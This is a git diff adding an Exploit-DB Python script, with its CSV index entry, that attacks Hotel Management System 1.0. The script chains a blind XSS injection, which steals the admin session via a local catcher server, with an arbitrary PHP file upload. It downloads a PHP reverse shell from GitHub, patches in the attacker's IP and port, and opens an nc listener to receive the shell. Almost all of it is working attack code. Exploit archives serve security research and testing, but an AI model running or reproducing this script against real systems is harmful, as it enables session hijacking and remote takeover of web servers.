diff --git a/exploits/php/webapps/50173.py b/exploits/php/webapps/50173.py new file mode 100755 index 000000000..f797d4418 --- /dev/null +++ b/exploits/php/webapps/50173.py @@ -0,0 +1,131 @@ +# Exploit Title: Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE) +# Date: 2021-08-01 +# Exploit Author: Merbin Russel +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204 +# Version: V1.0 +# Tested on: Linux + xampp 7.4.21 + +''' +What does This Script Do: + 1. Send BXSS payload to site + 2. Wait until admin fires it + 3. Steal admin's session using BXSS script + 4. Using Admin's session, upload php shell + 5. Make a reverse TCP connection + +Why does It need BXSS? + 1. Site contains file upload feature only in admin's panel. + 2. To upload a file we need to know credentials of admin or session + 3. BXSS used to steal admin's session to upload php file + +''' + +import socketserver as SocketServer +from http.server import BaseHTTPRequestHandler, HTTPServer +import sys +import requests +from time import sleep +import _thread as thread +import os +import multiprocessing + +try: + your_ip = sys.argv[1] + your_port = sys.argv[2] + site_url = sys.argv[3] +except IndexError: + print("please run this script as below format \npython3 text.py ") + sys.exit() + +site_url_xss= site_url + "enquiry.php" +os.system('echo "$(tput setaf 6) Trying To inject BXSS Script on site...."') +xss_script='cc@g.com ' +r = requests.post(site_url_xss, data={'fname':'name', 'email':xss_script,'mobileno':'2154124512','subject':'XSS', 'description':'Blind', 'submit1':' '}) +global session +session = "" +os.system('echo "$(tput setaf 6) BXSS Script has been successfully injected on site...."') +os.system('echo "$(tput setaf 6) Waiting for the BXSS payload to be fired..."') +def exploit_trigger(): + url_payload = site_url+"admin/pacakgeimages/payload.php" + r= requests.get(url_payload, allow_redirects=True) + +def listener(): + os_command= "nc -lvp" + str(int(your_port)+1) +"-n" + os.system(os_command) + +def exploit(): + p1 = multiprocessing.Process(name='p1', target=listener) + p2 = multiprocessing.Process(name='p2', target=exploit_trigger) + p1.start() + sleep(5) + p2.start() + +def upolad_file(): + os.system('echo "$(tput setaf 6) Trying To upload PHP reverse shell...$(tput sgr0)"') + global session + url = site_url+"admin/create-package.php" + cookies = {str(session.split("=",1)[0]): str(session.split("=",1)[1] )} + files = {'packagename': (None, 'Helloabcd123'), + 'packagetype': (None, 'Helloabcddfff'), + 'packagelocation': (None, 'locationing'), + 'packageprice': (None, '12345'), + 'packagefeatures': (None, 'python_free'), + 'packagedetails': (None, 'hello_excuse_me'), + 'packageimage': open('payload.php', 'rb'), + 'submit': (None, ' '),} + r = requests.post(url, files=files, cookies=cookies, verify=False) + exploit() + + + +def download_payload(): + os.system('echo "$(tput setaf 6) BXSS script has been fired..."') + os.system('echo "$(tput setaf 6) Downloading PHP reverse shell..."') + try: + url_payload= "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" + r = requests.get(url_payload, allow_redirects=True) + except: + url_payload= "https://raw.githubusercontent.com/e23e/Testing/master/php-reverse-shell.php" + r = requests.get(url_payload, allow_redirects=True) + open('payload_temp.php', 'wb').write(r.content) + reading_file = open("payload_temp.php", "r") + new_file_content = "" + for line in reading_file: + stripped_line = line.strip() + new_line = stripped_line.replace("$ip = '127.0.0.1'; // CHANGE THIS", "$ip = '"+your_ip+"'; // Changed") + if stripped_line == "$port = 1234; // CHANGE THIS": + new_line = stripped_line.replace("$port = 1234; // CHANGE THIS", "$port = '"+str(int(your_port)+1)+"'; // Changed") + new_file_content += new_line +"\n" + reading_file.close() + writing_file = open("payload.php", "w") + writing_file.write(new_file_content) + writing_file.close() + upolad_file() +def kill_me_please(server): + server.shutdown() + + +def grep_session(path_info): + global session + session= path_info.split("/?c=",1)[1] + download_payload() + +class MyHandler(BaseHTTPRequestHandler): + + global httpd + global x + x=0 + def do_GET(self): + global httpd + global x + if x>=1: + return + x=x+1 + grep_session(self.path) + self.send_response(200) + thread.start_new_thread(kill_me_please, (httpd,)) + + +httpd = SocketServer.TCPServer(("", 5555), MyHandler) +httpd.serve_forever() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ae27a1ed1..85275e73d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44303,3 +44303,4 @@ id,file,description,date,author,type,platform,port 50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",2021-08-02,"Akshay Khanna",webapps,php, 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php, 50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware, +50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",2021-08-03,"Merbin Russel",webapps,php,